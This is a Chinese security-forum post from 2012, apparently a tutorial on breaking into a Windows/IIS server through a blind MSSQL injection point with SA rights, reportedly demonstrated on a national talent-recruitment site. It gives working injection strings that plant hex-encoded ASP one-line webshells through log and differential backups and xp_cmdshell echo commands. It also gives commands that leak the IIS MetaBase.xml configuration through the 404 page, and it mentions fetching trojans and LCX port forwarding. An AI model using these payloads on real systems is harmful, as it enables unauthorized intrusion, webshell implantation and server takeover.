找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2122|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————: k7 V  d' R3 _
% N8 i3 c5 @. N3 w/ G/ t  U

: g. L0 s6 J* n; H9 a$ w                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
/ S6 L. D7 K9 b( q) c6 ?$ ~9 d: W; ~2 v  t3 u$ `' E
                                                                 , ?1 z; i6 u. F& H8 q
                                                                 ' B" G+ i: p! m7 X0 P
                                                                  论坛: http://www.90team.net/
# E. G0 ^9 G1 h. c  O" @
# O1 J; @+ y) K8 ^6 L5 P. ?4 K. J

" j1 w5 G: d2 M友情检测国家人才网5 h# u$ }  o5 x. t) l

1 c5 J( y! a- x; w" J# g
: V* @- T9 @0 G6 [& `& b内容:MSSQL注入SA权限不显错模式下的入侵
- |6 l9 w) Z! l) B" ~
  d7 i& L9 ~2 h# Y- W1 s
2 g* ]7 N2 O# s0 _, G一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
1 v, X7 B" {$ _8 G6 _! n  @1 n( j5 V3 `
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。1 h) V0 M% G$ P2 H  }' K( F7 r3 n

7 W  {# ?$ x5 d& u& Z' R+ y/ \0 O/ f" R. ]0 f" s$ ^+ c) H' C
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
" l9 Z2 H4 ?% S  B& G% |9 y6 E; _, r; e
思路:2 A- y+ L8 \2 `4 {

! o. T9 {* X3 J  l首先:
4 F( j! B& Q2 w
; v3 u1 \% C) ~- O2 P7 \* m( [通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
+ J  W2 A, w( K7 y* [0 ~' }' B/ S9 ^
1.日志备份获得Webshell2 a: ~6 M( i/ v2 E. \* Z" _* t

& Z, r8 o9 e7 k$ r3 C2 F- b+ ~2.数据库差异备份获得Webshell$ C4 k  F9 E3 ^

) b" n( f/ E' k, g4.直接下载免杀远控木马。
2 Z) e! d' A1 G3 a4 t0 ^% |% ?6 J/ P% w+ F1 ?% M* Y
5.直接下载LCX将服务器端口转发出来
- [" l6 B; d6 P3 p+ I7 W" U! Z' U6 J/ `& n, l* z  C) q
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。$ e1 r( F6 d) t) Y, f8 y
" N- b; f5 V0 `  h( K

+ k( i0 h  D, I: o1 x* N- q2 }+ p' J: _5 y
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
& u4 Z$ Y5 A) K8 }, ]! o2 g9 M# \  V1 G. ?
我直接演示后面一个方法8 j/ c3 c; v: r. w1 G

! h# d/ E& u* V( a, r
. h8 B2 F- G( A! F" N6 t分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL + K$ K7 |, g% G

% z0 p, Z7 \9 t+ K" u: }
% K1 R) {! e2 k( N$ b
2 E! t5 p; p& C
* Q$ A& Y* j0 [9 t/ R) X◆日志备份:% t- C1 c0 b! H

. W0 l) p3 R/ V9 V% t  f' ]
. O. |$ |; J$ k0 _# Y. o1. 进行初始备份
9 H, ?, p$ r) Q7 g9 a! c0 T; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
& |3 M0 K& c0 p. P$ ], z
  p! B% [  g4 B: |5 b9 d- P2. 插入数据% [, V8 t: e7 z) }& x; J0 t. m
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( f) N' b2 }! y& E" E3 u" \6 g  u" W0 G/ T+ p
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>  d' N, q1 i6 @0 a
  # g2 p8 J6 H8 \+ j& C0 H
3. 备份并获得文件,删除临时表
5 [- \9 S2 l4 M6 V. e: s;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--. Z( w- _* e7 K+ a. e5 f" X! P

1 Z- }( r5 i3 @' F  S6 ^- G' i6 l5 Y% `  A$ X& L, s: _7 S. H- {

0 O# [4 }3 P5 z1 \/ w/ k' Z/ ~/ `◆数据库差异备份9 F8 h% O; i0 R
- O! J5 U% S9 ^2 m8 E
(1. 进行差异备份准备工作
" [( T! Y6 n4 Y$ p; s) Z0 n6 Y# k- G! M5 L& z/ t. R
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
' W# m8 C; q0 R9 ^2 F* S4 S! R5 F( H; C0 `6 |9 }! Q
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
9 e1 X$ D  C% N' d. j/ c
4 |& o  Q1 S) I8 G8 P
) k% n- S6 ]3 b% T5 V! F: k' Y) L' \! C$ b(2. 将数据写入到数据库4 X1 x$ @; |! |) z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 3 X. b" Y* B) K

# V" F- J: n# a0 X& r0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 y+ f( V6 x- m5 O
# ~. G. v) G% U9 t( H0 n8 b. q: B3. 备份数据库并清理临时文件
0 S9 o" b9 G' Z- Z' w. b7 |4 u+ j) _' l- t" J7 @; _
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--1 G9 f& `  k' F% t) E
3 X* U% S- J( J8 }) @/ r1 X" V
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 6 L5 z/ g1 {& }1 O

5 d+ Q: Z: H8 W' s# [5 B
3 o/ k( a: k) o' v2 v5 C4 q( t/ R) i+ x) W0 R/ b7 [9 ~# s
用^转义字符来写ASP(一句话木马)文件的方法:   . U; W9 l* E6 [% `

6 [# k  K& J& \, k1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
; U! Q! a  _3 ~5 x! `+ k' M9 x0 d1 D5 ?) R, V9 @8 b
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp   k$ h2 `# Z4 v

. o, v0 T6 w3 Y- y5 `; ]5 ]读取IIS配置信息获取web路径& ~7 _6 ~6 p+ k/ |6 u; ^. S. e  K
$ C$ Z2 m0 f3 W  ~
     , l( x$ h4 F3 _# u; C5 {
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--  h8 A. y7 M$ v1 z7 {* |* v

$ J5 e) g& Z) \7 q5 h执行命令
) S0 |* R/ G) x) `0 `# k     
: h) [4 c0 w/ e; l+ P' n. x% ~/ K     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
/ F& ?! l6 Y- s+ }6 f, W, P) }1 l# b- p0 E
* e; j8 }1 G6 R  L0 w
7 u2 m: Y1 T8 D# j6 V
1 M" o4 A& R0 X9 R. I0 Z, v

- P  q7 c/ M7 b/ A) s* Z- x/ d9 b& r9 l; |& w$ c7 }: c2 C1 b
2 A* b& j( i& a
# }$ A3 G7 x" r0 Y2 W( f
% g" o3 ~4 _4 {6 B  R, }
' T: p+ f1 P- E; Z# g& n& n
: j& c2 j; E3 r/ `0 \
: D3 _: J9 f$ w( Y

6 \8 N9 O5 m; Z9 |5 a; d- \
7 Z- y7 O6 B) h. W7 ?7 H5 b8 R9 e0 G1 l5 _9 g

5 \0 T/ I$ q6 U* V& {! H  Q% ^' w- d9 D/ x! W% F& a' k5 {3 b$ X5 j

0 ?$ u) z: j& T' G$ G1 L: p4 ?% I# P, M4 x

. z5 u+ M! Z3 }# R# [- L& Q( w2 ?$ Q! z# `/ |5 p8 t8 }
" S/ i* d" z# _  ?% S
2 W' D/ P3 D, \* _# _5 P
" s. ~$ Y/ Z( s5 R) o" P$ i

- \2 k5 `2 t  N# k; v: n
0 s. A1 B& |0 T$ _( d& }2 M" c1 T- t* h( P9 [; O9 @- u% ]

' m* G2 g3 h1 X3 |5 R) o2 z8 y9 y! R. _8 q( ^$ J3 [: t9 \/ H7 P
5 `5 M  g; S5 X4 M
1 F4 w4 t8 R, ]. u* A/ Z( s. r
" \) y% f0 e) M4 r' o7 b
. g' w3 D8 _/ y5 G

. n# b8 L6 J! E% X  q; k* R9 j8 r1 V/ t0 ]

6 @3 ~8 h3 O/ z4 J! c7 l* z4 u' }/ T# z# b9 F4 q' L

# ?9 W* J+ ?6 y1 ?1 o, ^; R  H7 K6 l5 o# Y. Q0 k
4 N2 J1 S4 c+ y6 i8 q
+ o  h1 @' o0 z+ L1 U

  a- u* f" I- e# S7 R8 b. ?9 x, A2 o  w) R* s: k) S1 p

; A5 V% V4 r: g2 |# L! R) X5 N. T( ^  M7 ^. N

/ F) D3 y& t6 ~0 P% o+ \7 N1 M9 H- _! i% H) p9 `( U

% A8 s2 o2 p2 W/ ?& `' }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表